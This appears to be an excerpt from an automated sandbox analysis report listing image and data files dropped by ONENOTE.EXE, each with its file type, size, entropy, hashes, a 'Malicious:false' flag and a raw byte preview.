                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ............$..#s....%.....$..#s....%......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L...U..a.L."A.....N...^...............|.....dB.U.S............f........................................I.qk..B.....LZ..............L...U..a.L."A...........L...U..a.L."A.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):99293
                                                                                                                                                                                                              Entropy (8bit):7.9690121496708555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                                                                                              MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                                                                                              SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                                                                                              SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                                                                                              SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.335660083087687
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuWsFwUQeXLJCtZvadtEVpyCLXTparL9OW0ofBrdQqrId9nBX/xV/eB19ZPoR:YxsdLJC7CbEPFXQP9OB6BRQyILnX
                                                                                                                                                                                                              MD5:3EE81C928965FC15E73C9C1FA485D40A
                                                                                                                                                                                                              SHA1:66090ADB061092DE5719EBB69AB168ADA2B153CD
                                                                                                                                                                                                              SHA-256:6CF2C74F189B2FAB271329879DACD922F8E03B5287C9D2ED3FA9F913298F46B8
                                                                                                                                                                                                              SHA-512:A330927AF510A026677EA90D0AB63AD8B6A9EC186A7462DA3CA06E98CFCBF6FC66A0FE7947BA2E2E22DCCB92B1FD241F3A45FBE152A2BA45F45C96D3E695982C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZL.......L....C.:..H.N..L....C.:..H.N..L....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............=..v_.......g......N...^.................8.$6.B..a...L.........f........................................I.qk..B.....LZ.............=..v_.......g...........=..v_.......g...........L.......L.......L...........................................L..j....L..T.]..L.......L....B..L..H....L....B..L....>.)L....J...................;........4...4...4.."..............L...L...L....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........L.......L......#L..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2898
                                                                                                                                                                                                              Entropy (8bit):7.551512280854713
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                                                                                              MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                                                                                              SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                                                                                              SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                                                                                              SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.377578714449312
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qscy9ULUPeC6v9JEShaXTiq9xF2RQyRdHh94:qsz9ULUH02dXd9xYRJRph
                                                                                                                                                                                                              MD5:9DF2148C1ED2D36D8D3260A5CC44F46A
                                                                                                                                                                                                              SHA1:BB3BD95106A3CCB856720F6916F77DC77D761506
                                                                                                                                                                                                              SHA-256:F9FB24F01231CF5E41B6EAA3CEC525B5A2BE6E0D1ECDE4F8141B918706DCE042
                                                                                                                                                                                                              SHA-512:9D5128331A024720F251DD1B9EA18E915F9AB768AA1684598E8313901724CC64136E0CED875013487216B03163BD85FACE3FB360EFFC7CC469769E117CE89A94
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.............V7........=.....V7........=.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............G..................N...^......................I...1.U..........f........................................I.qk..B.....LZ.............G.......................G......................................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):29187
                                                                                                                                                                                                              Entropy (8bit):7.971308326749753
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                                                                                              MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                                                                                              SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                                                                                              SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                                                                                              SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.35288400020304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:pWsvdb/Nt+yEYY6gXM968RQy6r1rHA1XSe:pWsd/yxfXM968RJ6
                                                                                                                                                                                                              MD5:09DC133B824C60DBCD32A6CDCA658CB1
                                                                                                                                                                                                              SHA1:4F60CBAF2A0A0CD5B4575F8EAF5A6740BB39F46D
                                                                                                                                                                                                              SHA-256:79BD7D4C40D33063F5D3BD985998F7E79D8C5A6625D14E156C27ECA214BD1240
                                                                                                                                                                                                              SHA-512:5FA3E9B5FCD1D67EECDB66C1AD58E3D8E40CC97F40D44A8076F6EC5D0FEC2023E22B59F9EB34B3ECEC688CF00A4CBB857C194ECF9B57A67EB5B071AA04F9D4A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.........P....=..DC.F..P....=..DC.F....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G8....'......QG.....N...^................p,..F4L..$X..3........f........................................I.qk..B.....LZ............G8....'......QG.........G8....'......QG.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4819
                                                                                                                                                                                                              Entropy (8bit):7.874649683222419
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                                                                                              MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                                                                                              SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                                                                                              SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                                                                                              SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.373818341555194
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:GsagTTZGEgmtjLmGEnV5DNXAq9yzoJrdQqr6zBXhUFCkAno4FSfqW:Gs9ZGEgmYGEVVNXB9cARQyk/W
                                                                                                                                                                                                              MD5:4F6BAC604DF1B4D7ED9C584B178BB407
                                                                                                                                                                                                              SHA1:262443FE80862E68E9ACDC8DFFC6198C3E46399D
                                                                                                                                                                                                              SHA-256:264905ADFA3E0A8B4C2DCF9EC082A35545745B46315201CF562DD7572AD3728C
                                                                                                                                                                                                              SHA-512:54E91701674E7CD31EA57B825E5FAD938983197ED7E87CC408864BA0853938E6080FCB80E0D03751A1DD3540CEDDF021789538053DE6909007219C93B3314E7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......V...v...J...................................................................................................................................2...>...2.......v...~...........................=.......=..U....?.i...yz.I.......I.qk..B.....LZ=..U....?.i...yz=....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............|My...%.d}......N...^..................i.u.@.(....x+........f........................................I.qk..B.....LZ..............|My...%.d}............|My...%.d}...........=.......=.......=...........................................=..j....=..T.]..=.......=....B..=..H....=....B..=....>.)=....J...................;........4...4...4.."..............=...=...=....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........=.......=......#=..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1717
                                                                                                                                                                                                              Entropy (8bit):7.154087739587035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                                                                                              MD5:943371B39CA847674998535110462220
                                                                                                                                                                                                              SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                                                                                              SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                                                                                              SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.310103954024125
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:FdSsWBsWjantnMEKd793Xj99s3EoksrdQqrTdeaUBXEt1Id2E3/sg:FdSsPWjKCEKd53Xj99sUcRQyIaUsrSs
                                                                                                                                                                                                              MD5:16D677191F1D6192ABA22932F86E6CAF
                                                                                                                                                                                                              SHA1:63C4496574C32F63A3AF1BB6A9EFB8532F64693E
                                                                                                                                                                                                              SHA-256:86F11C8FA8226D25EE6BF45E44F36F1EE4D0746EE0CF17E79E6BA84E9588679B
                                                                                                                                                                                                              SHA-512:7FBEA322CA3C081138FBBE59AAD2206C036EC43D8927B23083AA631CAC1C0D8898B5A19135F173A34576959021869821AEC008308E414E98DFCEC7C1B088888B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZl.......l..L....6..lm..l..L....6..lm..l....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x...........=.b....N...^................a_.2.lC..8..:.x........f........................................I.qk..B.....LZ............x...........=.b........x...........=.b.........l.......l.......l...........................................l..j....l..T.]..l.......l...B..l..H....l....B..l....>.)l....J...................;........4...4...4.."..............l...l...l....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........l.......l......#l..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3555
                                                                                                                                                                                                              Entropy (8bit):7.686253071499049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                                                                                              MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                                                                                              SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                                                                                              SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                                                                                              SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.331273300403996
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ws0gH+pCnwEFLX0LL9MzQRQyEe9Ho3gSJP:ws2pcFLXwL9AQRJp+
                                                                                                                                                                                                              MD5:D0BEDA14E4457B5962C99C9E7943BAF8
                                                                                                                                                                                                              SHA1:2A9D62697E2C5F88D77CE68D7B2C38E4CD6C5D6C
                                                                                                                                                                                                              SHA-256:636B1C8B19843C2B7CDB29E91B05373B845E2B18ED1D546504B1197B6F6FF056
                                                                                                                                                                                                              SHA-512:0DE8FA5138F1A41206BFF3F7F46C9C42634EE1370C9B9A166A9AF0E65C10CEDEEFEDC0A76340EBFF1455A762763795D32788595685E2F73409F2852F8787BC07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ|.......|..7.....T|$...|..7.....T|$...|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............x.'V.m.".?..W......N...^...............8.T2..C...9.'.........f........................................I.qk..B.....LZ.............x.'V.m.".?..W...........x.'V.m.".?..W...........|.......|.......|...........................................|..j....|..T.]..|.......|....B..|..H....|....B..|....>.)|....J...................;........4...4...4.."..............|...|...|....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........|.......|......#|..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3428
                                                                                                                                                                                                              Entropy (8bit):7.766473352510893
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                                                                                              MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                                                                                              SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                                                                                              SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                                                                                              SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.330057560603714
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:SqqRsB9X+R0XmteZ2EXNrx7N9Xw9qqo9rdQqrlYBXSQ9g7WF:ssqRgmwwEXNrxh9Xw9d0RQyOH
                                                                                                                                                                                                              MD5:5D7CFA566DE4ED63110BEC0C405E92CF
                                                                                                                                                                                                              SHA1:1E7BE504DF5C29CC7F1F117AC1A3B7211DB376D8
                                                                                                                                                                                                              SHA-256:118F61F2E99FC0BA5A3302C1332858D91E6857923B79F816C48C163409769CA2
                                                                                                                                                                                                              SHA-512:5FC21861E8DE6DA4987A5D27A3F92E910EAC1800B6C465E653A2E326E4C5C07ED96AAA33661D13EE5B434B3CDF264F9860CB124261569EB4021F411A437479BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ."......."...... .q....G."...... .q....G."...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............V.DqT3..R....^N....N...^.................Y.A.C._T.M..........f........................................I.qk..B.....LZ.............V.DqT3..R....^N.........V.DqT3..R....^N.........."......."......."...........................................".j.....".T.]..."......."...B...".H....."...B..."...>.)."...J...................;........4...4...4.."..............."..."..."...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........".......".....#.".............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65589
                                                                                                                                                                                                              Entropy (8bit):7.960181939300061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                                                                                              MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                                                                                              SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                                                                                              SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                                                                                              SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.
